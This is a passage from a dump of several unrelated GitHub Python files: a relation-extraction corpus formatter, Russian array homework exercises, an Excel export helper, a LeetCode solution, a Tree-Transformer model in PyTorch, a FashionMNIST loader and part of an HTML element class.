== \"way-obj\":\n outputs.append(\"way-obj\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"obj-way\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"en-or\":\n outputs.append(\"en-or\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"or-en\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"other\":\n outputs.append(\"other\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"other\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"location\":\n outputs.append(\"locaA\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"locAa\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"w-c\":\n outputs.append(\"w-c\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"c-w\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"related\":\n outputs.append(\"related\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"prdcr-prdct\":\n outputs.append(\"pdr-pdt\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"pdt-pdr\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"ag-ins\":\n outputs.append(\"ag-ins\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ins-ag\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"med-ill\":\n outputs.append(\"med-ill\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ill-med\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"top-msg\":\n outputs.append(\"top-msg\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"msg-top\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(outputs)\n def merge_files(self,files,outputfile):\n outputs = []\n for file in files:\n with codecs.open(file,\"r\",\"utf8\") as read:\n lines = read.readlines()\n outputs.extend(lines)\n print(len(outputs))\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(outputs)\n\n def extract_relation_type(self,inputfile,outputfile):\n relations = {}\n outputs = []\n with codecs.open(inputfile, \"r\", \"utf8\") as read:\n lines = read.readlines()\n for line in lines:\n temps = line.split(\"\\t\")\n if len(temps) != 4:\n print(\"wrong\")\n relation = temps[0]\n pos1 = temps[1]\n pos2 = temps[2]\n sentence = temps[3].strip()\n outputs.append([relation,relation + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\"])\n if relation not in relations:\n relations[relation] = 1\n else:\n relations[relation] += 1\n output_items = []\n sentences = []\n for key,value in relations.items():\n if value>20:\n output_items.append(key)\n for item in outputs:\n if item[0] in output_items:\n sentences.append(item[1])\n else:\n print(item[0])\n print(len(sentences))\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(sentences)\n def train_test(self,files,trainfile,testfile):\n trains = []\n tests = []\n for file in files:\n with codecs.open(file, \"r\", \"utf8\") as read:\n lines = read.readlines()\n total = len(lines)\n print(total)\n test = random.sample(lines, int(total / 4))\n for item in test:\n lines.remove(item)\n print(len(test))\n print(len(lines))\n trains.extend(lines)\n tests.extend(test)\n print(str(len(trains)) + \" \" + str(len(tests)))\n with codecs.open(trainfile, \"w\", \"utf8\") as wrt:\n wrt.writelines(trains)\n with codecs.open(testfile, \"w\", \"utf8\") as wrt:\n wrt.writelines(tests)\n\ncf = CorpusFormat()\n# cf.word_divide([\"../训练语料/zhiliao2.txt\"],\"../训练语料/zhiliao2_outputs.txt\")\ncf.train_test([\"train_all2.txt\"],\"../files/train.txt\",\"../files/test.txt\")\n# cf.word_divide([\"/home/hunter/PycharmProjects/corpus_extraction/处理后语料/部分整体.txt\"],\"./output_whole.txt\")\n# cf.change_order(\"../训练语料/zhiliao2_outputs.txt\",\"../训练语料/zhiliao2_divides.txt\")\n# cf.merge_files([\"divides.txt\",\"divide_cause.txt\",\"divide_classify.txt\",\"divide_whole.txt\",\"divide_zhiliao.txt\",\"train_locAa.txt\",\"train_locaA.txt\",\"train_other.txt\"],\"samples_all.txt\")\n# cf.extract_relation_type(\"samples_all.txt\",\"train_all2.txt\")\n# cf.merge_files([\"../训练语料/zhiliao2_divides.txt\",\"../训练语料/train_all.txt\"],\"samples_all.txt\")","repo_name":"runqitian/kej_cnn_model","sub_path":"crps/corpus_format.py","file_name":"corpus_format.py","file_ext":"py","file_size_in_byte":10735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5192613156","text":"\"\"\" \nДьяченко Даниил\nАлгоритмы и структуры данных на Python.\nДомашнее задание к уроку 3.\n\nВ диапазоне натуральных чисел от 2 до 99 определить, сколько из них кратны каждому из чисел в диапазоне от 2 до 9.\nВо втором массиве сохранить индексы четных элементов первого массива. Например, если дан массив со значениями 8, 3, 15, 6, 4, 2, то во второй массив надо заполнить значениями 1, 4, 5, 6 (или 0, 3, 4, 5 - если индексация начинается с нуля), т.к. именно в этих позициях первого массива стоят четные числа.\nВ массиве случайных целых чисел поменять местами минимальный и максимальный элементы.\nОпределить, какое число в массиве встречается чаще всего.\nВ массиве найти максимальный отрицательный элемент. Вывести на экран его значение и позицию в массиве.\nВ одномерном массиве найти сумму элементов, находящихся между минимальным и максимальным элементами. Сами минимальный и максимальный элементы в сумму не включать.\nВ одномерном массиве целых чисел определить два наименьших элемента. Они могут быть как равны между собой (оба являться минимальными), так и различаться.\nМатрица 5x4 заполняется вводом с клавиатуры кроме последних элементов строк. Программа должна вычислять сумму введенных элементов каждой строки и записывать ее в последнюю ячейку строки. В конце следует вывести полученную матрицу.\nНайти максимальный элемент среди минимальных элементов столбцов матрицы. Примечание. Решите 6 интересных для вас задач из 9 (блок-схемы были нужны только в первом уроке, в этом и следующих практических заданиях их использование по желанию)\n\"\"\"\n\n# HW3.1 done\n\nl = [randint(2,100) for x in range(50)]\n\nb = 0\nfor j in range(2,10):\n for i in range(len(l)):\n if l[i] % j == 0:\n# print(j)\n b += 1\n print(j, \"кратно\", b, \"раз\")\n b = 0\n\n\n\n# HW3.2 done\n\nl = [randint(0,100) for x in range(50)]\nprint(l)\nn = []\nfor i in range(50):\n if l[i] % 2 == 0:\n n.append(i)\nprint(n)\n\n\n\n# HW3.3 done\nfrom random import randint\n\nl = [randint(0,1000) for x in range(50)]\nprint(\"Индекс минимального значения - \", l.index(min(l)), \"Значение - \", min(l))\nprint(\"Индекс максимального значения - \", l.index(max(l)), \"Значение - \", max(l))\n\na, b = l[l.index(min(l))], l[l.index(max(l))]\nl[l.index(max(l))], l[l.index(min(l))] = a, b\n# l[l.index(min(l))], l[l.index(max(l))] = l[l.index(max(l))], l[l.index(min(l))]\n\nprint(\"Индекс минимального значения - \", l.index(min(l)), \"Значение - \", min(l))\nprint(\"Индекс максимального значения - \", l.index(max(l)), \"Значение - \", max(l))\n\n\n# HW3.4.1\n# Со словарем решения не получилось. Не дошел до того как вытащить ключ.\nl = [randint(1,100) for x in range(50)]\nn = dict.fromkeys(l,0)\na = 0\nfor i in n.keys():\n for j in l:\n if i == j:\n n[i] = n[i] + 1\nprint(max(n.values()))\n\n\n\n# HW3.4 done\nl = [randint(1,100) for x in range(50)]\ncount_max = 0\nfor i in range(len(l)):\n count = 1\n for j in range(len(l)):\n if l[i] == l[j]:\n count += 1 \n if count > count_max:\n count_max = count\n x = l[i]\nprint(x , \" встречается x\", count_max)\n\n\n\n# HW3.5 done\n\nl = [randint(-50,50) for x in range(50)]\n#print(l) \nc = min(l)\nfor i in range(len(l)):\n if l[i] < 0 :\n b = l[i]\n if c < b:\n c = b\n# print(c)\nprint(c) \n\n\n\n# hw 3.8 done\n\n#matrix = [ [ randint(1,100) for i in range(4)] for i in range(4)]\nmatrix = [ [ int(input(\"..\")) for i in range(4)] for i in range(4)]\nfor i in range(4):\n \n print(*matrix[i], \" sum = \", end=\"\")\n print(sum(matrix[i]))\n\n\n# hw 3.9 done\n\na = 8\nmatrix = [ [ randint(1,100) for i in range(a)] for i in range(a)]\n\n# rotate = list(map(list, zip(*matrix)))\nresult = 0\nfor x in range(len(matrix)):\n n = matrix[0][x]\n for i in range(1,len(matrix)):\n if n > matrix[i][x]:\n n = matrix[i][x]\n print(n)\n \n if result < n:\n result = n\nprint(result)","repo_name":"daniilstv/GB_algorithms","sub_path":"alg_hw3.py","file_name":"alg_hw3.py","file_ext":"py","file_size_in_byte":5303,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24372896882","text":"import openpyxl,time,os\r\n\r\ndef export_data(res,page_start,page_end):\r\n wb = openpyxl.Workbook()\r\n sheet = wb.create_sheet(title=\"result\", index=0)\r\n header = [\"Protein\",\"Gene\",\"UniProt\",\"PDBe-KB\",\"Biological function\",\"Url\"]\r\n \r\n sheet.append(header)\r\n for item in res:\r\n for h in header:\r\n if h not in item:\r\n item[h] = ''\r\n sheet.append(\r\n [item['Protein'],\r\n item['Gene'],\r\n item['UniProt'],\r\n item['PDBe-KB'],\r\n item['Biological function'],\r\n item['Url'],\r\n ])\r\n out_path = \"out/out_{}_{}_{}.xlsx\".format(page_start,page_end,str(time.time()* 1000))\r\n wb.save(out_path)\r\n openFilePath = 'explorer /e,/select,{}'.format(os.path.abspath(out_path))\r\n os.popen(openFilePath)\r\n return os.path.abspath(out_path)","repo_name":"Zsk-d/get-gene","sub_path":"export_data.py","file_name":"export_data.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31079480995","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n dp = dict()\n \n def getProfit(i,buying):\n \n if i>=len(prices):\n return 0\n \n if (i,buying) in dp:\n return dp[(i,buying)]\n \n skip = getProfit(i+1,buying)\n if buying:\n buy = getProfit(i+1,not buying) - prices[i]\n dp[(i,buying)] = max(skip,buy)\n else:\n sell = getProfit(i+1,not buying) + prices[i]\n dp[(i,buying)] = max(skip,sell)\n return dp[(i,buying)]\n \n return getProfit(0,True)","repo_name":"Merwan-J/competetive-programming","sub_path":"122-best-time-to-buy-and-sell-stock-ii/122-best-time-to-buy-and-sell-stock-ii.py","file_name":"122-best-time-to-buy-and-sell-stock-ii.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40894096702","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport math, copy, time\nfrom torch.autograd import Variable\nimport pdb\nimport pickle\n\nclass EncoderDecoder(nn.Module):\n\n def __init__(self, encoder, decoder, src_embed, tgt_embed, generator):\n super(EncoderDecoder, self).__init__()\n self.encoder = encoder # 编码器\n self.decoder = decoder # 解码器\n self.src_embed = src_embed # 输入数据的向量\n self.tgt_embed = tgt_embed # 输出数据的向量\n self.generator = generator # 输出数据后面的全连接+softmax\n\n def forward(self, src, tgt, src_mask, tgt_mask):\n \"接收和处理原序列,目标序列,以及他们的mask\"\n return self.decode(self.encode(src, src_mask), src_mask, tgt, tgt_mask)\n\n def encode(self, src, src_mask):\n return self.encoder(self.src_embed(src), src_mask)\n # 编码单元是由输入向量及其掩膜。\n\n def decode(self, memory, src_mask, tgt, tgt_mask):\n return self.decoder(self.tgt_embed(tgt), memory, src_mask, tgt_mask)\n # 解码单元不仅需要输出向量与其掩膜,还需要编码单元的输出向量\n\nclass Generator(nn.Module):\n \"定义标准的linear+softmax生成步骤\"\n def __init__(self, d_model, vocab):\n super(Generator, self).__init__()\n self.proj = nn.Linear(d_model, vocab)\n\n def forward(self, x):\n return F.log_softmax(self.proj(x), dim=-1)\n\n\n# Encoder部分\ndef clones(module, N):\n \"产生N个相同的层\"\n return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])\n\n\nclass Encoder(nn.Module):\n \"\"\"N层堆叠的Encoder\"\"\"\n\n def __init__(self, layer, N,d_model, vocab_size):\n super(Encoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n # self.proj = nn.Linear(d_model, vocab_size)\n\n def forward(self, x, mask):\n \"每层layer依次通过输入序列与mask\"\n # break_probs = []\n group_prob = 0\n for layer in self.layers:\n # x, group_prob = layer(x, mask, group_prob)\n x, group_prob = layer(x, mask, group_prob)\n # break_probs.append(break_prob)\n x = self.norm(x)\n # break_probs = torch.stack(break_probs, dim=1)\n return x\n\nclass LayerNorm(nn.Module):\n \"\"\"构造一个layernorm模块\"\"\"\n\n def __init__(self, features, eps=1e-6):\n super(LayerNorm, self).__init__()\n self.a_2 = nn.Parameter(torch.ones(features))\n self.b_2 = nn.Parameter(torch.zeros(features))\n self.eps = eps\n\n def forward(self, x):\n \"Norm\"\n mean = x.mean(-1, keepdim=True)\n std = x.std(-1, keepdim=True)\n return self.a_2 * (x - mean) / (std + self.eps) + self.b_2\n\n\nclass SublayerConnection(nn.Module):\n \"\"\"Add+Norm\"\"\"\n\n def __init__(self, size, dropout):\n super(SublayerConnection, self).__init__()\n self.norm = LayerNorm(size)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, sublayer):\n \"add norm\"\n return x + self.dropout(sublayer(self.norm(x)))\n\n\nclass EncoderLayer(nn.Module):\n \"\"\"Encoder分为两层Self-Attn和Feed Forward\"\"\"\n\n def __init__(self, size, self_attn, feed_forward,group_attn, dropout):\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.group_attn = group_attn\n self.sublayer = clones(SublayerConnection(size, dropout), 2)\n self.size = size\n\n def forward(self, x, mask,group_prob):\n \"Self-Attn和Feed Forward\"\n group_prob = self.group_attn(x, mask, group_prob)\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, group_prob,mask))\n return self.sublayer[1](x, self.feed_forward), group_prob\n\n\n# Decoder部分\nclass Decoder(nn.Module):\n \"\"\"带mask功能的通用Decoder结构\"\"\"\n\n def __init__(self, layer, N):\n super(Decoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x, memory, src_mask, tgt_mask):\n for layer in self.layers:\n x = layer(x, memory, src_mask, tgt_mask)\n return self.norm(x)\n\n\nclass DecoderLayer(nn.Module):\n \"\"\"Decoder is made of self-attn, src-attn, and feed forward\"\"\"\n\n def __init__(self, size, self_attn, src_attn, feed_forward, dropout):\n super(DecoderLayer, self).__init__()\n self.size = size\n self.self_attn = self_attn\n self.src_attn = src_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 3)\n\n def forward(self, x, memory, src_mask, tgt_mask):\n \"将decoder的三个Sublayer串联起来\"\n m = memory\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))\n x = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))\n return self.sublayer[2](x, self.feed_forward)\n\n\ndef subsequent_mask(size):\n \"\"\"\n mask后续的位置,返回[size, size]尺寸下三角Tensor\n 对角线及其左下角全是1,右上角全是0\n \"\"\"\n attn_shape = (1, size, size)\n subsequent_mask = np.triu(np.ones(attn_shape), k=1).astype('uint8')\n return torch.from_numpy(subsequent_mask) == 0\n\n\n# Attention\ndef attention(query, key, value, mask=None, dropout=None,group_prob=None):\n \"计算Attention即点乘V\"\n # print(\"attention!!!!\")\n d_k = query.size(-1)\n # [B, h, L, L]\n scores = torch.matmul(query, key.transpose(-2, -1)) \\\n / math.sqrt(d_k)\n if mask is not None:\n seq_len = query.size()[-2]\n b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0)).cuda()\n # b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0))\n scores = scores.masked_fill((mask.long() | b.bool()) == 0, -1e9)\n\n if group_prob is not None:\n p_attn = F.softmax(scores, dim=-1)\n p_attn = p_attn * group_prob.unsqueeze(1).float()\n # print(\"CCCCCCCCCCCC\")\n else:\n p_attn = F.softmax(scores, dim=-1)\n if dropout is not None:\n p_attn = dropout(p_attn)\n return torch.matmul(p_attn, value), p_attn\n\n\nclass MultiHeadedAttention(nn.Module):\n def __init__(self, h, d_model, dropout=0.1):\n \"Take in model size and number of heads.\"\n super(MultiHeadedAttention, self).__init__()\n assert d_model % h == 0\n self.d_k = d_model // h\n self.h = h\n self.linears = clones(nn.Linear(d_model, d_model), 4)\n self.attn = None\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, query, key, value, group_prob=None,mask=None):\n \"\"\"\n 实现MultiHeadedAttention。\n 输入的q,k,v是形状 [batch, L, d_model]。\n 输出的x 的形状同上。\n \"\"\"\n if mask is not None:\n # Same mask applied to all h heads.\n mask = mask.unsqueeze(1)\n nbatches = query.size(0)\n\n # 1) 这一步qkv变化:[batch, L, d_model] ->[batch, h, L, d_model/h]\n query, key, value = \\\n [l(x).view(nbatches, -1, self.h, self.d_k).transpose(1, 2)\n for l, x in zip(self.linears, (query, key, value))]\n\n # 2) 计算注意力attn 得到attn*v 与attn\n # qkv :[batch, h, L, d_model/h] -->x:[b, h, L, d_model/h], attn[b, h, L, L]\n x, self.attn = attention(query, key, value, mask=mask, dropout=self.dropout,group_prob=group_prob)\n # 3) 上一步的结果合并在一起还原成原始输入序列的形状\n x = x.transpose(1, 2).contiguous().view(nbatches, -1, self.h * self.d_k)\n # 最后再过一个线性层\n return self.linears[-1](x)\n\n\nclass GroupAttention(nn.Module):\n def __init__(self, d_model, dropout=0.8):\n super(GroupAttention, self).__init__()\n self.d_model = 256.\n self.linear_key = nn.Linear(d_model, d_model)\n self.linear_query = nn.Linear(d_model, d_model)\n # self.linear_output = nn.Linear(d_model, d_model)\n self.norm = LayerNorm(d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, context, eos_mask, prior):\n\n batch_size, seq_len = context.size()[:2]\n context = self.norm(context)\n\n a = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), 1)).cuda()\n b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0)).cuda()\n c = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), -1)).cuda()\n tri_matrix = torch.from_numpy(np.triu(np.ones([seq_len, seq_len], dtype=np.float32), 0)).cuda()\n\n # mask = eos_mask & (a+c) | b\n # a = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), 1))\n # b = torch.from_numpy(np.diag(np.ones(seq_len, dtype=np.int32), 0))\n # c = torch.from_numpy(np.diag(np.ones(seq_len - 1, dtype=np.int32), -1))\n # tri_matrix = torch.from_numpy(np.triu(np.ones([seq_len, seq_len], dtype=np.float32), 0))\n\n mask = eos_mask.long() & (a + c).bool()\n\n key = self.linear_key(context)\n query = self.linear_query(context)\n\n scores = torch.matmul(query, key.transpose(-2, -1)) / self.d_model #Q·K转置/d\n\n scores = scores.masked_fill(mask == 0, -1e9)\n neibor_attn = F.softmax(scores, dim=-1)\n neibor_attn = torch.sqrt(neibor_attn * neibor_attn.transpose(-2, -1) + 1e-9)\n neibor_attn = prior + (1. - prior) * neibor_attn\n\n t = torch.log(neibor_attn + 1e-9).masked_fill(a == 0, 0).matmul(tri_matrix)\n g_attn = tri_matrix.matmul(t).exp().masked_fill((tri_matrix.int() - b) == 0, 0)\n g_attn = g_attn + g_attn.transpose(-2, -1) + neibor_attn.masked_fill(b == 0, 1e-9)\n return g_attn\n # return g_attn, neibor_attn #C先验矩阵 每层的a序列\n\n# Position-wise Feed-Forward Networks\nclass PositionwiseFeedForward(nn.Module):\n \"实现FFN函数\"\n\n def __init__(self, d_model, d_ff, dropout=0.1):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff)\n self.w_2 = nn.Linear(d_ff, d_model)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x):\n # return self.w_2(self.dropout(F.relu(self.w_1(x))))\n return self.w_2(self.dropout(gelu(self.w_1(x))))\n\n# Embeddings\nclass Embeddings(nn.Module):\n def __init__(self, d_model, vocab):\n super(Embeddings, self).__init__()\n self.lut = nn.Embedding(vocab, d_model)\n self.d_model = d_model # 表示embedding的维度\n\n def forward(self, x):\n return self.lut(x) * math.sqrt(self.d_model)\n\n\n# Positional Encoding\nclass PositionalEncoding(nn.Module):\n \"实现PE功能\"\n\n def __init__(self, d_model, dropout, max_len=256):\n super(PositionalEncoding, self).__init__()\n self.dropout = nn.Dropout(p=dropout)\n\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0., max_len).unsqueeze(1)\n div_term = torch.exp(torch.arange(0., d_model, 2) *\n -(math.log(10000.0) / d_model))\n\n pe[:, 0::2] = torch.sin(position * div_term) # 偶数列\n pe[:, 1::2] = torch.cos(position * div_term) # 奇数列\n pe = pe.unsqueeze(0) # [1, max_len, d_model]\n self.register_buffer('pe', pe)\n\n def forward(self, x):\n x = x + Variable(self.pe[:, :x.size(1)], requires_grad=False)\n return self.dropout(x)\n\ndef gelu(x):\n \"\"\"Implementation of the gelu activation function.\n For information: OpenAI GPT's gelu is slightly different (and gives slightly different results):\n 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n Also see https://arxiv.org/abs/1606.08415\n \"\"\"\n return x * 0.5 * (1.0 + torch.erf(x / math.sqrt(2.0)))\n# 定义一个接受超参数并生成完整模型的函数\ndef make_model(src_vocab, tgt_vocab, N=6, d_model=512, d_ff=2048, h=8, dropout=0.1):\n \"根据输入的超参数构建一个模型\"\n c = copy.deepcopy\n attn = MultiHeadedAttention(h, d_model)\n group_attn = GroupAttention(d_model)\n ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n\n position = PositionalEncoding(d_model, dropout)\n model = EncoderDecoder(\n Encoder(EncoderLayer(d_model, c(attn), c(ff), group_attn,dropout), N,d_model,src_vocab),\n Decoder(DecoderLayer(d_model, c(attn), c(attn),\n c(ff), dropout), N),\n nn.Sequential(Embeddings(d_model, src_vocab), c(position)),\n nn.Sequential(Embeddings(d_model, tgt_vocab), c(position)),\n Generator(d_model, tgt_vocab))\n\n # 使用xavier初始化参数,这个很重要\n for p in model.parameters():\n if p.dim() > 1:\n nn.init.xavier_uniform_(p)\n return model","repo_name":"iceraionly/MyTree-Transformer","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":12843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16830147500","text":"# -*- coding: utf-8 -*-\n\nfrom torchvision import datasets\nfrom torchvision import transforms\nfrom torch.utils.data import DataLoader\n\nBATH_SIZE = 128\n\n# Note transforms.ToTensor() scales input images\n# to 0-1 range\n\nresize_transform = transforms.Compose([transforms.Resize((32, 32)),\n transforms.ToTensor()])\n\ntrain_dataset = datasets.FashionMNIST(root='data',\n\t\t\t\t\t\t\t\t\t train=True,\n\t\t\t\t\t\t\t\t\t transform= resize_transform,\n\t\t\t\t\t\t\t\t\t download=False)\n\ntest_dataset = datasets.FashionMNIST(root='data',\n\t\t\t\t\t\t\t\t\t train=False,\n\t\t\t\t\t\t\t\t\t transform= resize_transform)\n\ntrain_loader = DataLoader(dataset=train_dataset,\n\t\t\t\t\t\t batch_size=BATH_SIZE,\n\t\t\t\t\t\t shuffle=True)\n\ntest_loader = DataLoader(dataset=test_dataset,\n\t\t\t\t\t\t batch_size=BATH_SIZE,\n\t\t\t\t\t\t shuffle=True)\n\n# # Checking the dataset\n# for images, labels in train_loader:\n# \tprint('Image batch dimensions:', images.shape)\n# \tprint('Image label dimensions:', labels.shape)\n# \tbreak\n","repo_name":"SeventeenChen/fashionMNIST_LeNet_master","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"40428073110","text":"from lxml.html import HtmlElement, etree\nfrom numpy import mean\n\n\nclass Element(HtmlElement):\n _id: int = None\n _selector: str = None\n _parent_selector: str = None\n _alias: str = None\n _tag_name: str = None\n _path: str = None\n _path_raw: str = None\n _children = None\n _parent = None\n _siblings = None\n _descendants = None\n _text = None\n _number_of_char: int = None\n _number_of_a_char: int = None\n _number_of_punctuation: int = None\n _number_of_a_descendants: int = None\n _number_of_p_descendants: int = None\n _number_of_children: int = None\n _number_of_siblings: int = None\n _number_of_descendants: int = None\n _density_of_punctuation: int = None\n _density_of_text: float = None\n _density_score: float = None\n _similarity_with_siblings: float = None\n _a_descendants: list = None\n _a_descendants_group: dict = None\n _a_descendants_group_text_length: dict = None\n _a_descendants_group_text_min_length: float = None\n _a_descendants_group_text_max_length: float = None\n \n density_score: float = None\n \n @property\n def id(self):\n \"\"\"\n get id by hashed element\n :return:\n \"\"\"\n if self._id is not None:\n return self._id\n self._id = hash(self)\n return self._id\n \n @property\n def nth(self):\n \"\"\"\n get nth index of this element in parent element\n :return:\n \"\"\"\n return len(list(self.itersiblings(preceding=True))) + 1\n \n \n @property\n def alias(self):\n \"\"\"\n get alias of element, using all attributes to construct it.\n :return: string\n \"\"\"\n if self._alias is not None:\n return self._alias\n from gerapy_auto_extractor.utils.element import alias\n self._alias = alias(self)\n return self._alias\n \n @property\n def selector(self):\n \"\"\"\n get id by hashed element\n :return:\n \"\"\"\n if self._selector is not None:\n return self._selector\n from gerapy_auto_extractor.utils.element import selector\n self._selector = selector(self)\n return self._selector\n \n @property\n def children(self):\n \"\"\"\n get children of this element\n :return: \n \"\"\"\n if self._children is not None:\n return self._children\n from gerapy_auto_extractor.utils.element import children\n self._children = list(children(self))\n return self._children\n \n @property\n def siblings(self):\n \"\"\"\n get siblings of this element\n :return: \n \"\"\"\n if self._siblings is not None:\n return self._siblings\n from gerapy_auto_extractor.utils.element import siblings\n self._siblings = list(siblings(self))\n return self._siblings\n \n @property\n def descendants(self):\n \"\"\"\n get descendants of this element\n :return: \n \"\"\"\n if self._descendants is not None:\n return self._descendants\n from gerapy_auto_extractor.utils.element import descendants\n self._descendants = list(descendants(self))\n return self._descendants\n \n @property\n def parent_selector(self):\n \"\"\"\n get id by hashed element\n :return:\n \"\"\"\n if self._parent_selector is not None:\n return self._parent_selector\n from gerapy_auto_extractor.utils.element import selector, parent\n # TODO: change parent(self) to self.parent\n p = parent(self)\n if p is not None:\n self._parent_selector = selector(p)\n return self._parent_selector\n \n @property\n def tag_name(self):\n \"\"\"\n return tag name\n :return:\n \"\"\"\n if self._tag_name:\n return self._tag_name\n self._tag_name = self.tag\n return self._tag_name\n \n @property\n def text(self):\n \"\"\"\n get text of element\n :return:\n \"\"\"\n if self._text is not None:\n return self._text\n from gerapy_auto_extractor.utils.element import text\n self._text = text(self)\n return self._text\n \n @property\n def string(self):\n \"\"\"\n return string of element\n :return:\n \"\"\"\n return etree.tostring(self, pretty_print=True, encoding=\"utf-8\", method='html').decode('utf-8')\n \n @property\n def path(self):\n \"\"\"\n get tag path using external path function\n :return:\n \"\"\"\n if self._path is not None:\n return self._path\n from gerapy_auto_extractor.utils.element import path\n self._path = path(self)\n return self._path\n \n @property\n def path_raw(self):\n \"\"\"\n get tag raw path using external path raw function\n :return:\n \"\"\"\n if self._path_raw is not None:\n return self._path_raw\n from gerapy_auto_extractor.utils.element import path_raw\n self._path_raw = path_raw(self)\n return self._path_raw\n \n @property\n def number_of_char(self):\n \"\"\"\n get text length\n :return:\n \"\"\"\n if self._number_of_char is not None:\n return self._number_of_char\n from gerapy_auto_extractor.utils.element import number_of_char\n self._number_of_char = number_of_char(self)\n return self._number_of_char\n \n @property\n def number_of_a_descendants(self):\n \"\"\"\n get number of a descendants\n :return:\n \"\"\"\n if self._number_of_a_descendants is not None:\n return self._number_of_a_descendants\n from gerapy_auto_extractor.utils.element import number_of_a_descendants\n self._number_of_a_descendants = number_of_a_descendants(self)\n return self._number_of_a_descendants\n \n @property\n def number_of_a_char(self):\n \"\"\"\n get a text length\n :return:\n \"\"\"\n if self._number_of_a_char is not None:\n return self._number_of_a_char\n from gerapy_auto_extractor.utils.element import number_of_a_char\n self._number_of_a_char = number_of_a_char(self)\n return self._number_of_a_char\n \n @property\n def number_of_p_descendants(self):\n \"\"\"\n return number of paragraph\n :return:\n \"\"\"\n if self._number_of_p_descendants is not None:\n return self._number_of_p_descendants\n from gerapy_auto_extractor.utils.element import number_of_p_descendants\n self._number_of_p_descendants = number_of_p_descendants(self)\n return self._number_of_p_descendants\n \n @property\n def number_of_punctuation(self):\n \"\"\"\n get number of punctuation\n :return:\n \"\"\"\n if self._number_of_punctuation is not None:\n return self._number_of_punctuation\n from gerapy_auto_extractor.utils.element import number_of_punctuation\n self._number_of_punctuation = number_of_punctuation(self)\n return self._number_of_punctuation\n \n @property\n def number_of_children(self):\n \"\"\"\n get children number\n :return:\n \"\"\"\n if 